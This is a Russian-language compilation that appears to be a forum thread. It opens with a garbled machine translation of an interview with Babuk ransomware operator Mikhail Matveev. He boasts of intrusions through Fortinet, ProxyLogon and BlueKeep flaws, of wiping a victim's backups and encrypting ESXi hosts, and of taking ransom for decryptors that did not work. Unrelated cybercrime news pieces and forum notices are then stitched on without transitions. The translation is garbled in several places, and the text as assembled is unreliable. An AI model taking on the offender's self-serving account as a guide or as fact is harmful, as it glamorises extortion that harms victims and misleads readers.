Матвеев поговорил с аналитиком и продакт-менеджером Записанное будущее Дмитрием Смилянецем о своем регионе с другими хакерами, подробностях атак программ-вымогателей, в которых он участвовал, и о том, как он был направлен на имя Бабук. Беседа велась на английском языке и переводилась на английский с помощью лингвистов из группы Insikt Recorded Future. «Рекорд» не смог провести независимую проверку всех оценок Матвеева — маркерные иммобилизационные организации либо отказались комментировать интервью, либо не ответили на запросы. Представитель офиса главного технического округа Колумбия заявил, что нападение на столичное полицейское управление является частью продолжающегося расследования, которое они не могут обсуждать.
Интервью, скрытое ниже, было отредактировано для увеличения глубины и ясности.
Дмитрий Смилянец: За последний год исследователи называли вас разными именами: Бабук , БорисЕльчин , Вазавака , unc1756 , Orange и даже KAJIT. Это действительно все имена для вас? Или была допущена ошибка?
Михаил Матвеев: Да, все эти ники, кроме одного, мои. Я никогда не был Каджитом. Я устал это доказывать на форуме везде и даже так называемым исследователям и журналистам.
ДС: Вас «заметили» после атаки программ-вымогателей в апреле прошлого года на столичное полицейское управление в Вашингтоне, округ Колумбия. Вы использовали данные, украденные с серверов отдела, для вымогательства, включая базу информаторов. Но потом блог пропал и Babuk развалился, а исходный код просочился . Что случилось?
ММ: Незадолго до событий, связанных со столичным управлением полиции, на форуме мне написал один чувак. Не буду называть его никнейм, но все прекрасно понимают , о ком идет речь. Он мне сказал: «Борис, у меня есть мегакрутой продукт». Он прислал мне несколько сборок, которые я протестировал — все работало нормально. Меня все устраивало. Человек вроде адекватный. Мы начали развивать эту возможность, и компания увлеклась этим продуктом.
Мы назвали его вымогателем Babuk . Все прошло очень хорошо. Они заплатили выкуп. Мы все расшифровали. После этого мы захотели создать партнерскую программу, и я нашел программиста для панели [администрирования партнерской программы-вымогателя]. Потом к нам пришел один товарищ [аффилированная сторона], который действительно сказал, что у него есть доступ в РОВД . Я не проводил эту атаку. Но он провел атаку в полном объеме. Они зашифровали полицейский участок и все скачали.
Переговоры абсолютно ничего не дали. Аффилиаты хотели определенный выкуп, а в итоге, как мы говорим по-русски, «наложили штаны и побежали», когда дело дошло до загрузки данных. Они отказались принять встречное предложение MPD о выкупе в размере 100 000 долларов. Но мой ответ был таким: «Если вы не примете деньги, я опубликую эти данные в блоге». На что аффилиаты в ужасе попросили меня этого не делать. Я сказал им, что украденные данные являются собственностью партнерской программы Babuk. Ну, они стали мне угрожать , что найдут меня. Я просто заблокировал эту партнерку и начал загружать данные в блог.
Партнеры пытались создать новый блог Babuk, так как домен Tor был моим. Но я не дал им этого сделать, и партнерская программа развалилась . Взлом полицейского управления стал последней каплей в крахе этой партнерки, хотя к этому приводило множество разных ситуаций. Например, была огромная ошибка в дешифраторе для гипервизоров ESXi [VMware ESXi — это гипервизор корпоративного класса, тип 1, разработанный VMware для развертывания и обслуживания виртуальных компьютеров]. Он просто обнулил вывод с дисков, и мы уничтожили данные как минимум двух компаний. Мы взяли у них деньги за расшифровщик, но они не смогли расшифровать свои данные. По сути, мы их обманули.
ДС: Затем появился форум **** [примечание редактора: **** — криминальный подпольный форум, на котором операторы программ-вымогателей и их аффилированные лица рекламируют свою продукцию]. Зачем ты его создал и зачем передал другим?
ММ: Я создал **** для использования лукового домена Babuk. К счастью, у Babuk было огромное количество трафика. Так и родилась идея создать форум ****. Когда форум стал популярным, я понял, что не хочу им заниматься, потому что это абсолютно не приносит прибыли. Это понесло только расходы. Постоянные распределенные атаки типа «отказ в обслуживании» (DDoS). Все сводилось к тому, чтобы переписать двигатель с нуля и потратить на это кучу денег.
Потом там начались какие-то схематичные вещи, и всех пришлось проверять. Я подумал про себя, Боже, зачем я подписался на это? Именно там на форуме я познакомился с Каджитом. Я сказал Каджиту: «Эй, будь модератором, проверь всех, а я подкину тебе денег». Вот так форум фактически попал в руки Каджита. После этого в моей жизни случились всевозможные проблемы. Я сильно ударился в бутылку, и у меня совсем не было времени на форум, поэтому я отдал форум Каджиту. Потом произошла череда странных событий, когда мне начали писать партнерские программы. Они сказали: «Что, черт возьми, ты делаешь, животное? Скриншоты наших панелей просочились». Мне стало стыдно за всю эту ситуацию. Я пошел на форумы и открыл частную жалобу на Каджита от имени Бориса. На тот момент мы очень хорошо общались со службой поддержки LockBit. Он показался мне нормальным парнем, и я подтянул его в этих переговорах. Каджит сказал, что его не забанят, и он ни с кем не будет делиться форумом. Администратор форума Damage [XSS] предложил Каджиту передать форум кому-то другому, и, насколько я знаю, Столлман это получил. Форум **** все еще существует, но я туда не захожу, и у меня не было особых контактов со Столлманом.
DS: Как часто люди из разных партнерских программ конкурируют в одной сети, чтобы вымогать деньги у жертв? Были ли у вас такие ситуации?
ММ: Это случается часто. Особенно, когда несколько человек владеют эксплойтом, или заливают логи с одного и того же рынка трафика, если речь идет о добыче учетных данных начального доступа с помощью стилера. Я взял некоторые исходные коды, так называемые proof-of-concept, с GitHub и модифицировал их. Если вы помните, для Fortinet VPN была известная CVE. Нашли у одного программиста с форума. Исходя из списка IP-адресов, мы получили примерно 48 000 точек входа. Я был очень удивлен тогда, действительно шокирован. Но мы не отработали даже 3% этого списка. Недостаточно времени.
И когда другие — ну скажем, наши конкуренты — стали использовать эту уязвимость, по сетям пошли пересечения. Я часто заходил в уже залоченные кем- то сети и не трогал их, потому что это не моя работа второй раз шифровать, а какие-то ребята разогнали сети. Они заходят и видят, что он зашифрован, и чтобы никто не получил его, они снова зашифровали его. Были случаи, когда мы с ребятами просто пересекались в сети во время разработки, обменивались контактами и как-то обсуждали, что делать дальше. Мы в основном всегда соглашались.
Бабук-вымогательство-леде
И даже бывало, что мы потом совместно делали какие-то другие проекты. Летом
2022 года это происходит сплошь и рядом, потому что все жаждут материала. Как
мы можем получить первоначальный доступ? На самом деле вариантов не много.
Есть уязвимости, такие как RCE в различных продуктах VPN-устройств, всё, что
может дать доступ в сеть. Или логин доступа к сети от стилеров. Но в основном
сейчас все залиты с обменов трафиком и уникального трафика мало. А те, у кого
он есть, льют просто для себя или уже работают в каких-то командах, так что
это абсолютно нормально, что в сетях есть конфликт интересов и теперь его
будет еще больше.
DS: Расскажите мне о некоторых атаках, которые вам особенно запомнились. Какой был самым быстрым? Сколько времени прошло от первого проникновения в сеть до получения платежа?
ММ:Дмитрий, таких атак я бы выделил несколько… Да, интересных было довольно много. Я хотел бы подвести итог, прежде чем говорить о нападениях. Есть маленькие сети, есть средние сети и есть очень большие сети. И я вам скажу, гораздо проще работать с сетью организации с доходом в 1 миллиард долларов, чем с сетью организации с доходом в 9 миллионов долларов. Я скажу вам, почему. Существует гораздо больше компьютеров, на которых легче спрятаться и проще ориентироваться, чем в небольшой сети, где вы ограничены. Вы должны двигаться очень быстро. И когда я начинал свою карьеру, я начал с BlueKeep — уязвимости в Microsoft Remote Desktop. Я взламывал пять небольших сетей в день, потому что мне нужно было идти и делать это прямо сейчас. Но по мере моего продвижения время, которое я тратил на хаки, увеличивалось.
Давайте начнем, не так ли? Моя самая долгая разработка… Наверное, все слышали о компании Capcom. Я попал туда через уязвимость Fortinet . Собственно говоря, когда я туда зашел, меня немного удивило, что там все на японском. Иерархии нет, деления на отделы нет, и все у них в куче. Я нашел мертвого администратора домена. Так появилось имя Бабук. У Capcom был админ Бабак, или бамбук. И когда я нашел этого администратора, я понял, что его никто не использует, но он был корпоративного типа.
Вообще атаку на Capcom я очень хорошо описал в статье Бориса Ельцина «Ты думаешь, я тебя не переиграю». Что ж, было несколько интересных моментов, которые я упустил, и которые я хотел бы осветить в этом интервью. В те дни у меня был очень близкий разговор с небезызвестным «Unknown», который сказал мне прийти к ним в группу, и если я поставлю на них Capcom, он свяжет меня с какими-то нереальными мега людьми. И все в моей жизни будет «чики бомбони» [прим. ред.: это дословный перевод — непонятно, что он имеет в виду]. Но слава богу, все пошло не так, потому что, наверное, меня бы сейчас здесь не было. Я бы не стал давать тебе это интервью. Их продукт в то время был ужасен — у GandCrabуровень. Они не хотели ничего с этим делать, и он сказал мне лично: «Они все равно платят нам, потому что боятся». Ну, в те времена так оно и было. Если помните, lalartu , такой персонаж, который просто, не ища бэкапа, не ища всего подряд, запускал билд по всем сетям и собирал деньги. Я сам видел его отчеты и панели, и меня удивило, как человек может это делать. Тогда платили практически всем, особенно REvil. У них были огромные доходы.
Ну, объяснил я пресловутому Unknown : «Вот, милый человек. У вас есть какие-то дыры, какие-то баги в продукте. Да я там не запер [зашифровал], я там как-то обосрался». На что он пообещал все исправить. Ждал долго, наверное месяца полтора прошло от обладания контроллером домена до самой блокировки. Это была самая долгая атака. Вот, собственно, перед тем, как я захотел залочить Capcom, я ему еще раз написал: «Ну что, все работает?» Он говорит: «Да, да, все работает». И я сделал билд и протестировал его в небольшой сети, насколько я помню. Это был какой-то муниципалитет, и хоть платили копейки, но мне это не нравилось. Я написал Unknown о своем недовольстве.
Все будет хорошо, сказал он, разворачивай. В то же время я очень тесно общался с одним из аффилированных лиц Рагнара. Он жил за границей. Кстати, возможно, он там уже сидит в тюрьме, потому что точно был за границей. Ну мы все как-то быстро пообщались и договорились, в Capcom все быстро сделали . А, на следующее утро Unknown пишет мне, типа, какого хрена. Я сказал, братан, извини, без обид, я тебя предупредил. Он обиделся на меня, заблокировал меня и отошел, как поступил бы ребенок, когда отнимаешь игрушку. Мальчики сказали мне, что он хочет найти меня в реальной жизни. Unknown любил это делать, любил играть жестко и играть в бандитов. Они слишком шумели, наверное, как и я сейчас, в то время, когда не надо было так шуметь.
Самая быстрая атака в моей жизни случилась, как только я получил уязвимость ProxyLogon . В то время у меня был на гранте программист, который дорабатывал эксплойт. Одной из интересных сетей была логистическая компания в Нидерландах . Большой склад. очень большой склад. Я попал на экскурсию на сервер. Здесь я сразу же получил токены администратора домена. Ну, эти ребята совсем не испугались и ни о чем не беспокоились. Помню, я зашел туда в 20:00 по московскому времени, а около 4:00 по московскому времени там уже все было заперто. С 6 утра нам в панике написал администратор, на что я ему сказал, братан, жди супервайзера.
Итак, давайте шаг за шагом. Глядя в сети вроде все просто и понятно. У них есть домен администратора для нас. Пароль был один на все, на гипервизорах, на резервном сервере в рабочей группе. Проанализировав сеть, я нашел систему резервного копирования WIM. Я смог достать из него все пароли и тем самым получил все бэкапы, хотя их бэкапы были такие плохие. Они только что сделали резервную копию на NAS [сетевое хранилище]. Я пошел в NAS и отформатировал его. Зашел на ESXi, зашифровал и там, примерно через час, он нам написал.
Ровно в полночь админ написал: «Хочу решить вопрос». Я сказал, что вопрос не может быть решен, потому что он не начальник. Утром пришлось лететь в другой город. Помню, сижу в аэропорту, мне компания пишет: $2 млн. Перевод 2 млн долларов. У меня никогда не было такой суммы в кошельке. Конечно, в таком удивлении и ажиотаже я сажусь в самолет, понимая, что у меня есть, блин, ноутбук с 2 миллионами долларов. Ну, я дал им расшифровщики, а когда приехал, открыл чат. Черт возьми, что-то там не так, они просто орут: Вы уничтожили VMDK [VMDK — это формат файла, который описывает контейнеры для виртуальных жестких дисков, которые будут использоваться в виртуальных машинах, таких как VMware Workstation или VirtualBox]. Я попытался разобраться и попросил образцы VMDK. И они просто весят ноль КБ. Ну все пиздец.у кого был рак ». Как так? Он говорит: ну не знаю, говорит, что-то сломалось. И просили вернуть деньги. Ну, у нас не было выбора, кроме как заблокировать их. Мы обманули их на эти деньги. Я до сих пор виню себя за это. Это была самая быстрая и платежеспособная атака, которую я когда-либо совершал.
DS: Как вы получаете доступ к сетям?
ММ: Я взял все с GitHub. Как говорится, сделан из дерьма и палок. Первым интересным эксплойтом был Fortinet, а затем очень старая уязвимость в приложении SharePoint. Затем был SonicWall. В общем, я всегда пытался получить первоначальный доступ с RCE [удаленное выполнение кода]. Я пробовал покупать бревна у похитителей RedLine . Но наилучшую точку входа дает RCE.
ИЗОБРАЖЕНИЕ: МИХАИЛ МАТВЕЕВ
К сожалению, каталоги Windows устроены таким образом, что, находясь внутри
каталогов, сеть разворачивается костяшками домино. На самом деле ничего
сложного, Windows вам в помощь. Трахни меня, чувак. Я раздвигаю ноги перед
тобой. Я никогда ничего не покупал. Еще раз повторю. Все было сделано из
дерьма и палок. Все зарабатывается просто так. Все, что описывается в СМИ, это
то, что мы супер группа вымогателей, супер-мега крутые чуваки, которых много.
Нет, абсолютно все обычные ребята, в основном работающие в одиночку.
ДС: Как удается опережать защитников? Или они настолько медленные, что это не имеет значения?
ММ: Здесь все очень просто. Специалисты по кибербезопасности, никто из них никогда не был настоящей мишенью. Это как стрелять на дальность из ружья. Вы вроде бы стреляете и попадаете в цель, но если вам дадут автомат и бросят на поле боя, то тоже будет много факторов, которые будут мешать вам попасть в цель — внутренний страх, и другие чувства.
Это живые люди. Поэтому, поскольку они никогда не были в боевых условиях, они никогда не тестировали эти сети в боевых условиях. Именно поэтому мы на шаг впереди. Они думают иначе. Они мыслят теоретически. С точки зрения теории, существуют целые команды и APT-сообщества, атакующие некоторые сети. Так что я скажу так: если бы все группы вымогателей вдруг стали специалистами по кибербезопасности, а те, кто сейчас являются специалистами по кибербезопасности, начали пентестировать сети, программам-вымогателям пришел бы конец.
DS: Какой вы видите индустрию программ-вымогателей через три года? Останутся ли программы-вымогатели лучшей моделью монетизации для киберпреступников или они перейдут на что-то другое?
ММ: Это похоже на то, как когда-то кардинг был популярен, и в нем было много денег, но теперь он мертв. А вымогатели скоро умрут — не через три года, а раньше. Буквально все изменилось за последние полгода. С начала спецоперации в Украине почти все отказались платить. Я часто сталкивался с людьми, которые писали мне в чат: «Вы русский оккупант. Довольствуйтесь $ 10k. И мы не дадим вам больше. По крайней мере, возьми это. Конверсия [или рентабельность инвестиций] полностью упала за последние шесть месяцев. В общем, работать стало тяжело.
Если умрет, то умрет. Вам нужно придумать что-то новое. Но программы- вымогатели хуже героина. Я не пробовал, но видел людей, которые на нем сидят, и вот что я вам скажу: программы-вымогатели хуже наркомании. Нигде нет таких денег, как в вымогателях. Я даже сравнил его с наркоторговцами из гидры [крупнейший в мире даркнет-маркетплейс, который был закрыт в этом году]. Они зарабатывают меньше, чем мы.
Но на данный момент вымогатели остаются лидером по монетизации. В интернете нет других схем, которые несли бы большую монетизацию. Или я о них еще не знаю.
DS: Как война в Украине повлияла на распространение программ-вымогателей и киберпреступность в целом?
ММ: Я не буду называть это войной в Украине, я назову это спецоперацией. Я надеюсь, вы понимаете. Это оказало огромное влияние. У меня было много друзей из Украины. Из всего моего списка контактов жителей Украины только один или два человека на данный момент общаются со мной. Остальные все ушли. Меня называют оккупантом.
Это ужасно, отрасль реорганизовалась. Я не знаю, началась бы спецоперация, но, насколько мы все знаем, Россия начала потихоньку идти на сотрудничество с США в отношении киберпреступности. Я обосралась и потом очень боялась, много пила. Я перечитал нашу Конституцию и понял, что меня, блин, оставят в России, но было страшно [прим. ред.: у России нет договора об экстрадиции с США]. О деньгах я уже забыл, а тут спецоперация началась. Я был чертовски счастлив. Хотя вы понимаете, что глупо об этом говорить, потому что мое интервью будут читать и граждане Украины, и мог погибнуть чей-то отец или их ребенок. Я начал радоваться, знаете ли, безнаказанно. Но, если бы не спецоперация,
Д.С.: Вам предлагали работать в определенных государственных службах? Если да, то какие?
ММ: Вы, наверное, хотите услышать какие-то секреты, но секретов совсем нет. Меня даже удивило, что за всю историю моей карьеры с 2011 года ко мне так никто и не пришел. Ни ФСБ, ни МВД. Я просто жил обычной жизнью.
Я даже не понимаю, когда читаю на форумах, что к какому-то парню приходила ФСБ и заставляла работать. Мне кажется, что они все врут, и сами пошли в ФСБ проситься на работу — но я не знаю, как это работает. Структура ФСБ очень секретна. В отличие от американцев, ФСБ не размещает на своем сайте портреты, чтобы сказать: смотри, я смотрю Most Wanted Cyber. Мне непонятно, чего хотят добиться американцы. Я вообще ничего не знаю о работе ФСБ РФ. Для меня это темная лошадка. Я мог бы даже быть рад пересечься с ними, но нет, это не обязательно.
ДС: Расскажи мне секрет. Между ФСБ и ФБР кто вас больше всего пугает?
ММ: Что меня больше всего беспокоит? Если эти две структуры начинают контролировать друг друга — то мне пиздец, минимальный три пожизненных периода.
Вашингтон в одностороннем порядке закрыл канал связи с Россией по вопросам кибербезопасности. Об этом "Российской газете" рассказал замсекретаря Совбеза РФ Олег Храмов. Он пояснил, что в феврале, после пресечения деятельности хакерской группировки REvil, Москва предложила сотрудничать и разработать совместные меры по защите объектов критической инфраструктуры обеих стран. Стороны даже обменялись их списками. "Однако сейчас Белый дом уведомил нас о том, что в одностороннем порядке выходит из переговорного процесса и закрывает канал связи", — рассказал Храмов.
Hey,
Quick message, don't login into raidforums. It's most likely hacked and now a
clone site is running on their domain.
A moderator stated that the new site will be on: https://rf.to. Not to shit
on xss or something, just wanted people to
be safe and know what's happening ^^
_fe-acc18.ru
_sky-fraud.ru
RU
Этот ресурс заблокирован
Сервис FERUMSHOP закрыт навсегда в ходе спецоперации правоохранительных органов.
Управление "К" БСТМ МВД России предупреждает: хищения денежных средств с банковских карт незаконны!
ENG
This resource is blocked
The FERUMSHOP service is permanently closed during a special law enforcement operation.
Department "K" of the BSTM of the Ministry of Internal Affairs of Russia warns: theft of funds from bank cards is illegal!
ст. 187 УК РФ: Изготовление, приобретение, хранение, транспортировка в целях использования или сбыта, а равно сбыт поддельных платежных карт, распоряжений о переводе денежных средств, документов или средств оплаты, а также электронных средств, электронных носителей информации, технических устройств, компьютерных программ, предназначенных для неправомерного осуществления приема, выдачи, перевода денежных средств.
Наказывается лишением свободы на срок до семи лет.Click to expand...
Как вы знаете с начала июля мы ушли в офф после того как пропал анноун. Так как не было никакого подтверждения о причине его пропажи - мы возобновили работу, думая что он умер.
Но так как у нас сегодня 17.10 с 12:00 по москве кто-то поднял hidden-сервисы ленда и блога с такими же ключами, как и у нас - мои опасения подтвердились. Бэкапы есть у третей стороны с ключами онион-сервисов.
Проверил сервера - признаков компрометации не обнаружил. За ключами своих кампаний - обращайтесь ко мне в токс.
Пока-что мы - офф.
Из-за неработающих компьютеров роженице не сделали важные тесты, что привело к гибели ее дочери
В штате Алабама грудная девочка с серьезной травмой мозга погибла, поскольку
ей не была оказана надлежащая медицинская помощь из-за атаки вымогательского
ПО на компьютерные сети больницы.
Мать погибшего ребенка Тейранни Кидд (Teiranni Kidd) подала в суд на
медицинский центр Спрингхилла за то, что, когда она приехала рожать,
администрация не предупредила о неработающих из-за кибератаки компьютерных
сетях больницы.
Согласно [иску](https://www.documentcloud.org/documents/21072978-kidd-amended- complaint) , женщине была оказана крайне ограниченная помощь. В частности, врачи и медсестры не провели ряд ключевых тестов, которые показали бы, что шею младенца обвила пуповина. Это привело к травме мозга малыша и его смерти девятью месяцами спустя.
Судебный иск является первым заслуживающим доверия публичным заявлением о том, что кибератака, в результате которой хакеры удаленно заблокировали работу компьютеров в больнице с целью вымогательства, хотя бы частично повинна в смерти человека. Если бы медучреждение сообщило будущей маме о неработающих из-за кибератаки компьютерах, она поехала бы в другую больницу, и трагедии можно было бы избежать, говорится в иске.
Как стало известно “Ъ”, для фигурантов крупнейшего шпионского скандала — бывших начальников отдела оперативного управления Центра информационной безопасности (ЦИБ) ФСБ Сергея Михайлова и отдела компьютерных инцидентов «Лаборатории Касперского» Руслана Стоянова — гособвинение запросило максимальные сроки наказания. Это означает, что обвиняемые в раскрытии ФБР за $10 млн способов и методов ведения оперативно-разыскной деятельности по делу основателя и гендиректора процессинговой компании Chronopay Павла Врублевского могут провести по 20 лет в колонии строгого режима. Сам господин Врублевский назвал “Ъ” запрошенные сроки «симметричным ответом» на приговоры, которые выносят в США гражданам России.
По данным “Ъ”, 18 февраля на процессе по делу Сергея Михайлова и Руслана Стоянова, который проходит в Московском окружном военном суде в закрытом для СМИ режиме, состоялись прения сторон. Представитель Главной военной прокуратуры (ГВП), который поддерживает обвинение, посчитал, что вина подсудимых в совершении преступления, предусмотренного ст. 275 (госизмена) УК РФ, полностью доказана, и потребовал для них по 20 лет колонии строгого режима. В ответных выступлениях защита попросила оправдать подсудимых, считая, что, напротив, фактов госизмены в их деле не было. Ожидается, что на следующей неделе господа Михайлов и Стоянов, не признающие свою вину, выступят с последним словом, после чего судья удалится для вынесения приговора.
Уголовное дело в отношении Сергея Михайлова и Руслана Стоянова следственное управление ФСБ возбудило 6 декабря 2016 года. Вскоре на рабочих местах контрразведчики задержали сотрудника ЦИБ, а потом и бывшего оперативника управления специальных технических мероприятий МВД майора Руслана Стоянова. Он к этому времени уже работал в «Лаборатории Касперского».
Помимо них были задержаны и арестованы Лефортовским судом еще два фигуранта — подчиненный господина Михайлова Дмитрий Докучаев и бизнесмен Георгий Фомченков, но материалы их дела до военного суда пока не дошли. Все четверо были обвинены в госизмене.
По версии следствия, полковник ФСБ Сергей Михайлов в 2011 году через посредников передал сотрудникам ФБР сведения об оперативно-разыскной деятельности по делу основателя и гендиректора процессинговой компании Chronopay Павла Врублевского, которого в США считают киберпреступником. Эти данные полковник Михайлов и его подчиненный получили, участвуя в оперативной разработке господина Врублевского, который обвинялся в организации DDoS-атаки на платежную систему Assist в июле 2010 года, из-за которой граждане несколько дней не могли приобрести электронные билеты «Аэрофлота». По версии следствия, собрав сведения, относящиеся к гостайне, полковник Михайлов записал их на компакт-диск, который передал майору Докучаеву, а тот — сотруднику «Лаборатории Касперского» Руслану Стоянову.
Последний в 2011 году полетел на международную конференцию по
кибербезопасности в Нью-Денвер (Канада). Там, как следует из материалов
уголовного дела, господин Стоянов передал диск Кимберли Зенц, сотруднице
американской компании I-Defence, занимающейся защитой информации и активно
сотрудничающей, по данным ФСБ, с ФБР. По аналогичной схеме, считает следствие,
действовал и предприниматель Георгий Фомченков, вывезший еще один диск с
секретными данными в США. По некоторым данным, за информацию им обещали
вознаграждение на общую сумму $10 млн. Однако сколько именно получили
предполагаемые изменники и нашли ли у них крупные суммы денег, до сих пор
неизвестно.
Господин Врублевский о сроках, запрошенных обвинением, узнал от “Ъ”. При этом
сам бизнесмен посчитал их «логичным и симметричным ответом на те приговоры,
которые выносятся в отношении российских граждан в США».
Господин Врублевский отметил, что роль обоих обвиняемых в преступлении была явно разной: полковник Михайлов, отметил он, это «умный враг и предатель, который отлично понимал, чем он занимается и какой ущерб его действия наносят Родине». По мнению господина Врублевского, чекист «вначале хотел добиться карьерного роста и сам пошел на сотрудничество с ФБР, которое, как я понимаю, начало снабжать его информацией». Реализуя эти данные, полковник поднялся по службе, а когда в ответ от него потребовали раскрытия оперативных методов работы ФСБ, он «легко согласился». Что касается Руслана Стоянова, то, по мнению господина Врублевского, тот «скорее заигрался в борьбу с киберпреступностью, хакерами, а на самом деле был просто использован Михайловым в своей игре».
• Source: kommersant.ru/doc/3889581
Злоумышленникам будет нелегко обналичить украденные биткойны — большая часть средств занесена в черный список бирж.
Крупные суммы биткойнов, украденные с криптовалютной биржи Bitfinex шесть лет назад, были перемещены хакерами на новый адрес.
«94 643,29 биткойнов (примерно $3,55 млрд) были перемещены в ходе 23 транзакций из кошелька, связанного с кражей у Bitfinex в 2016 году, на новый адрес», — сообщила аналитическая компания Elliptic.
Маловероятно, что средства будут обналичены в ближайшее время, полагают эксперты. Криптовалюта, полученная в результате взлома, медленно отмывается уже более пяти лет, и обналичивание больших объемов за короткий период времени привлечет нежелательное внимание.
Количество перемещенных биткойнов составило 79% от общего количества украденных средств (119 756 биткойнов). Последний раз хакеры перемещали украденные биткойны в апреле 2021 года, осуществив перевод на сумму более $700 млн на неизвестные кошельки во время ажиотажа, вызванного листингом криптовалютной биржи Coinbase на Nasdaq. Согласно Elliptic, средства были отмыты через рынки даркнета, такие как Hydra, и кошелек Wasabi.
Большая часть биткойнов, связанных со взломом Bitfinex, отслеживается и занесена в черный список. Таким образом, хакерам будет сложно обналичить деньги на известных централизованных биржах.
source: blockchair.com/ru/bitcoin/address/bc1qazcm763858nkj2dj986etajv6wquslv8uxwczt
В новом документальном фильме HBO утверждается, что личность таинственного создателя биткоина раскрыта. И это открытие может вызвать шок на криптовалютных рынках и за их пределами и даже на президентских выборах США, учитывая то, как кандидат от республиканцев и бывший президент Дональд Трамп заручился поддержкой биткоин-энтузиастов, пишет издание Politico.
Документальный фильм является последней работой номинанта на премию “Эмми” Каллена Хобака, который получил признание критиков за свой сериал “Q: В бурю”, разоблачающий авторов теории заговора QAnon. Большой показ состоится в следующую среду в 14:00 по центральноевропейскому времени (во вторник в 19:00 по восточному времени).
Биткоин стал финансовым феноменом эпохи Интернета. С момента своего создания в 2009 году устойчивая к цензуре криптовалюта, которая существует в децентрализованном реестре под названием блокчейн, стала средством сбережения для тех, кто убежден, что традиционные деньги систематически обесцениваются; средством спекуляции для тех, кто чувствует себя исключенным из обычных финансовых рынков; и, что немаловажно, популярным средством об оплате незаконных товаров и услуг, таких как наркотики, кибермошенничество и заказные убийства.
При поддержке таких ярых сторонников, как Tesla и генеральный директор SpaceX Илон Маск, он превратился в класс активов стоимостью в триллион долларов, приобретя такие масштабы, что даже центральные банки были вынуждены рассматривать его как потенциального конкурента своим собственным системам.
Таким образом, разоблачение Сатоши Накамото как его предполагаемого создателя грозит вызвать ряд серьезных вопросов, не в последнюю очередь о его потенциальном соучастии в преступлениях, связанных с использованием биткоина. Это также может сделать его одним из богатейших людей в мире: сам Сатоши, по оценкам, контролирует около 1,1 млн биткоинов, но неясно, есть ли у него все еще доступ к криптографическим ключам. Если бы он это сделал, то его чистый капитал по текущим оценкам составил бы 66 млрд долларов.
Источник: [https://www.finam.ru/publications/i...o-sozdatelya-bitkoina- raskryta-20241004-0936/](https://www.finam.ru/publications/item/lichnost- tainstvennogo-sozdatelya-bitkoina-raskryta-20241004-0936/)
ZDNet France сообщает, что основатель BTC-e, 41-летний россиянин Александр Винник, был приговорен во Франции к пяти годам лишения свободы и штрафу в размере 100 000 евро за отмывание денег для киберпреступников.
Изначально Виннику грозил более серьезный срок, однако французская прокуратура не сумела доказать, что он участвовал в создании и распространении вымогателя Locky, который был активен в 2016-2017 годах. В сущности, из многочисленных обвинений, связанных с Locky, вымогательством и причастности к преступной деятельности, вина Винника была доказана только в связи с организованным отмыванием денег.
Напомню, что изначально Винник был арестован в Греции, куда прилетел на отдых в 2017 году, за участие в работе криптовалютной биржи BTC-e. Тогда власти США потребовали его эстрадиции и заявили, что Винник использовал BTC-e в качестве подставной компании для операций по отмыванию денег, сознательно получая средства от взломов и других форм киберпреступности, а также помогая мошенникам конвертировать украденные средства в фиат. Официальное заявление Минюста гласило, что Винник не только руководил преступной группой с 2011 года и отмыл через BTC-e более 4 млрд долларов в биткоинах, но также был причастен если не к самому ограблению биржи Mt. Gox, то хотя бы к отмыванию похищенных средств.
Однако за арестом последовала долгая судебная тяжба. Дело в том, что как только об аресте Винника стало известно, российские власти тоже подали запрос об экстрадиции, утверждая, что Винник является подозреваемым по другому делу, и России он с 2013 года обвиняется в мошенничестве на сумму 9500 евро. Многие эксперты полагают, что это была попытка российских властей «вытащить» Винника из-под стражи и вернуть в Россию.
В итоге споры из-за экстрадиции Винника растянулись надолго и дополнительно усложнились, когда французские власти тоже подали собственный запрос о его экстрадиции, заявляя, что намерены судить Винника по 14 обвинениям, связанным с отмыванием денег и взломами.
Изначально адвокаты Винника даже выиграли дело, и в 2018 году суд решил экстрадировать его в Россию, однако в силу серьезного политического давления со стороны официальных лиц как из России, так и из США греческие власти приняли решение передать Винника французам весной 2020 года.
Как уже было сказано выше, французский судебный процесс особенным успехом не увенчался. Из 14 выдвинутых обвинений было доказано лишь одно, а остальные доказательства Европола успешно оспорили адвокаты обвиняемого.
В настоящее время основатель BTC-e остается под арестом, а официальные представители США и России уже подали новые запросы о его экстрадиции (на этот раз французским властям). Защитники Винника, в свою очередь, уже сообщили, что намерены обжаловать недавно вынесенный приговор.
Источник: xakep.ru/2020/12/08/vinnik-sentenced/
Хакерская группировка Head Mare взяла ответственность за остановку работы сервиса доставки СДЭК, который третий день не выдает клиентам заказы.
«„Хэд Марэ“ не дала времени СДЭК на то, чтобы защитить себя. Сисадмины оказались слишком слабы. А политики безопасности не оправдали себя. СДЭК продолжает нести знамя худшей доставки по России, обгоняя даже почту РФ», — говорится в заявлении группы в соцсети Х.
Хакеры утверждают, что зашифровали базы данных СДЭК и уничтожили резервные копии корпоративных систем, которые якобы делались в службе раз в полгода. Источник «Ведомостей» в компании подтвердил, что взломщики использовали вирус- шифровальщик.
Сайт и приложение СДЭК перестали открываться с утра 26 мая. В компании заявили о масштабном «техническом сбое». Служба приостановила прием и выдачу отправлений, «чтобы избежать ошибок при ручной обработке заказов».
«В течение понедельника мы значительно продвинулись в восстановлении полноценной работы, но, к сожалению, оказались не готовы возобновить обслуживание. Команда СДЭК приносит искренние извинения всем клиентам, чьи ожидания мы не оправдали», — заявила компания утром 28 мая. В СДЭК заверили, что все посылки клиентов находятся в безопасности.
Директор по коммуникациям СДЭК Михаил Берггрен в беседе с агентством «Интерфакс» пообещал, что компания намерена возобновить выдачу отправлений в пунктах выдачи заказов не позднее 29 мая. «Мы работаем над полным возобновлением обслуживания, но также заготовили и резервные схемы», — сказал он.
В начале полномасштабного вторжения войск РФ в Украину российские солдаты использовали СДЭК для отправки огромных посылок с украинской границы. На этом фоне в СДЭК отказались пересылать товары без кассовых чеков.
x.com/head_mare/status/1795072931489345946
vedomosti.ru/business/articles/2024/05/28/1039828-prichinoi-sboya-v-rabote-
sdek-mog-stat-virus-shifrovalschik
vk.com/cdek_express?w=wall-19813602_50790
interfax.ru/russia/962646
Неверные решения компании привели к абсолютной власти над системами жертвы.
Группировка ALPHV/BlackCat заявила о своих планах зашифровать системы компании Henry Schein в третий раз. Усилия группы являются частью давления на компанию за прекращение переговоров после масштабной кибератаки, произошедшей в октябре. Продолжающиеся переговоры с хакерами ухудшаются, и группировка обвиняет компанию в отсутствии профессионализма.
